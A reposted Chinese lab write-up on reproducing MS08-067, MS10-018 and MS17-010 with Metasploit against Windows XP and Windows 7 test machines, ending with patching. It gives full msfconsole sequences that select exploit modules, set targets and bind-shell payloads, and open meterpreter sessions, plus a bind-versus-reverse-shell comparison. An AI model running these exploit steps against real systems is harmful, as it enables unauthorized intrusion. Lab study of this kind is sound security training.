13-MSF常见漏洞复现

news/2025/3/12 9:23:45/文章来源:https://www.cnblogs.com/bokexiLu/p/18617052

1、MS08-067、MS10-018漏洞复现,对比bind和reverse攻击模式的区别

  • MS08-067

    环境:使用kali中的MSF工具攻击Windows XP

    1. 开启msfconsole,搜索MS08-067漏洞,进入漏洞利用模块

      msfconsole
      search ms08-067
      use  exploit/windows/smb/ms08_067_netapi 
      
    2. 查看配置项show options

    3. 设置相应的配置项

      set rhosts 10.0.0.171	#攻击的目标地址(Windows XP)
      set payload windows/meterpreter/bind_tcp	#设置攻击模式
      show targets	#查看可攻击的目标类型
      set target 34	#设置攻击目标类型(Windows XP SP3 Chinese - Simplified (NX))
      
    4. 检查配置信息无误

      image-20241212163849726

    5. 执行exploit攻击(前提:保证目标防火墙是关闭的状态)

      成功拿下:

      image-20241212165336981

  • MS10-018

    • 漏洞利用复现

      msfconsole
      search ms10-018
      use exploit/windows/browser/ms10_018_ie_behaviors
      set srvhost		#设置反弹监听地址(kali)
      set uripath test01		#设置uri路径名称
      options 	#检查配置信息
      run 	#发起攻击
      
    • msf生成访问地址,让靶机访问url

      image-20241212172510051

      image-20241212172147174

    • 生成监听会话,成功拿下meterpreter

      sessions -l 	#列出全部会话
      sessions -i 1 	#选择会话1利用
      

      image-20241212172659933

  • bind和reverse攻击模式的区别:

    bind攻击模式是kali主动攻击靶机(由外到内),具有攻击行为容易被安全设备拦截,而reverse模式是靶机主动连接Kali(由内到外)反弹shell,不具有攻击行为不会被安全设备所拦截。

2、MS17-010漏洞复现

(1)针对靶机系统使用0~3漏洞利用模块进行攻击

  • 利用win7漏洞满足环境:

    • 防火墙必须允许SMB流量出入:关闭防火墙

    • 目标必须使用SMBv1协议 (默认)

    • 目标必须缺少MS17-010补丁 (默认)

    • 目标必须允许匿名IPC$和管道名:cmd - gpedit.msc(打开组策略)> Windows设置 > 安全设置 > 本地策略 > 安全选项 > 网络访问:限制对命名管道和共享的匿名访问 - 禁用

  • 0 ~ MS17-010(windows/smb/ms17_010_eternalblue)

    search ms17-010
    use 0
    options
    set rhosts 10.0.0.154 	#Win7的地址
    run
    

    成功拿下meterpreter

    image-20241212185028891

  • 1 ~ MS17-010(exploit/windows/smb/ms17_010_psexec)

    search ms17-010
    use 1
    options
    set rhosts 10.0.0.154 	#Win7的地址
    run
    

    成功拿下meterpreter

    image-20241212185400616

  • 2 ~ MS17-010(auxiliary/admin/smb/ms17_010_command)

    search ms17-010
    use 2
    options
    set command whoami
    set rhosts 10.0.0.154 	#Win7的地址
    run
    

    image-20241212185736392

  • 3 ~ MS17-010(auxiliary/scanner/smb/smb_ms17_010)

    search ms17-010
    use 3
    options
    set rhosts 10.0.0.154 	#Win7的地址
    run
    

    image-20241212185927553

(2)分别注明0~3漏洞利用模块的攻击效果和利用条件,完成漏洞修复

漏洞 攻击效果 利用条件
0~windows/smb/ms17_010_eternalblue 直接拿下meterpreter 目标:防火墙关闭、使用SMBv1协议、无MS17-010补丁
1~exploit/windows/smb/ms17_010_psexec 直接拿下meterpreter 目标:防火墙关闭、使用SMBv1协议、无MS17-010补丁、允许匿名IPC$和管道名
2~auxiliary/admin/smb/ms17_010_command 返回命令执行结果 目标:防火墙关闭、使用SMBv1协议、无MS17-010补丁、允许匿名IPC$和管道名
3~auxiliary/scanner/smb/smb_ms17_010 仅作扫描 目标:防火墙关闭、使用SMBv1协议、无MS17-010补丁

漏洞修复:Win7中下载ms17-010补丁

再次利用ms17-010漏洞时,回显结果显示已不存在漏洞,证明补丁打入成功

image-20241212193747287

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/855366.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vue-节流防抖函数的使用

第一步 安装underscore.js第二步引入

Map集合类和Set集合类介绍和题目演练

Map集合的介绍、定义和特点 Map是一种将键(key)映射到值(value)的对象。在Java中,它是一个接口,有像HashMap、TreeMap等多种实现类。定义:以键值对(key - value)的形式存储数据。键是唯一的,通过键可以快速查找、获取对应的值。例如,存储学生学号(键)和学生姓名(…

vue-实现loading页面

效果实现步骤 第一步先编写一个加载页面在APP.vue中引入将控制加载的变量添加到状态管理库中例如pinia或VueX中在loading页面中导入常量并控制主体是否显示在请求拦截器和响应拦截器里配置

超绝!基站/Wi-Fi/GPS定位技术详解与应用示例

今天特别分享定位相关示例,欢迎大家一起来探讨。一、基站/Wi-Fi/GPS定位概述 1.1 基站定位原理 基站定位也就是“LBS定位”,全称是Location Based Service,它包括两层含义: 首先是确定移动设备或用户所在的地理位置;其次是提供与位置相关的各类信息服务。意指与定位相关的…

LuaTools日志相关内容来喽~帮工程师朋友解决99%的问题

本文将详细介绍LuaTools日志的相关内容,帮助你解决在使用过程中可能遇到的99%的问题。 LuaTools新版下载/使用教程: https://docs.openluat.com/Luatools/ 一、LuaTools日志分类 LuaTools包括4种日志:工具本身的日志、用户日志、底层日志、死机日志。 1. 工具本身的日志 在工…

【路由交换】华为交换机和路由器配置DHCP和DHCP中继

1.DHCP原理和实验拓扑 1.1.DHCP原理 DHCP一共有四个阶段:DHCP Discover 、DHCP Offer、DHCP Request、DHCP ACKDHCP Discover:发送DHCP Discover消息,寻找DHCP Server,表示自己需要获取一个IP地址 DHCP Offer:响应所收到的DHCP Discover消息,把准备提供的IP地址携带在DHC…

jquery表格转excel表格插件

excel-gen.js是一款jquery表格转excel表格插件。该jquery插件可以在客户端将HTML表格导出为Excel表格,并且下载为一个xlsx类型的Excel文件。在线演示 下载使用方法 excel-gen.js表格转excel表格插件依赖于jszip.js和FileSaver.js插件。<script src="path/to/jquery.m…

软考中级 网络工程师教程(第六版) 信息系统项目管理师教程(第四版)扫描PDF

封面 网络工程师教程 (第六版) 信息系统项目管理师教程(第四版)下载链接 网络工程师教程(第六版) 信息系统项目管理师教程(第四版)

第四天案例联系-热词

效果:五个热词点击可以跳转到指定页面,悬停时有颜色区别 遇到问题:文字在各个块中水平,垂直居中显示①水平显示:text-align:center【注意:要注意将这个属性设置到父级元素】②垂直显示:line-height:80px【通过行高来设置,将行高设置与块的大小一样】<!DOCTYPE htm…

广州互联网知识付费系统有哪些

当前,在广州地区,有多家机构专注于开发和定制各类互联网知识付费系统,旨在为教育与相关领域的专业人士提供优质解决方案。这些系统的功能覆盖了知识内容发布、交易以及用户的学习需求,并结合多种营销工具以满足用户多样化的应用场景。@www.tuzhi.ltd 侵删这类服务主要提供知…

20222404 2024-2025-2 《网络与系统攻防技术》实验八实验报告

1.实验内容 (1)Web前端HTML 能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。 (2)Web前端javascipt 理解JavaScript的基本功能,理解DOM。 在(1)的基础上,编写JavaScript验证用户名、密码的规则。在用户点击登陆按钮后回显“欢迎+…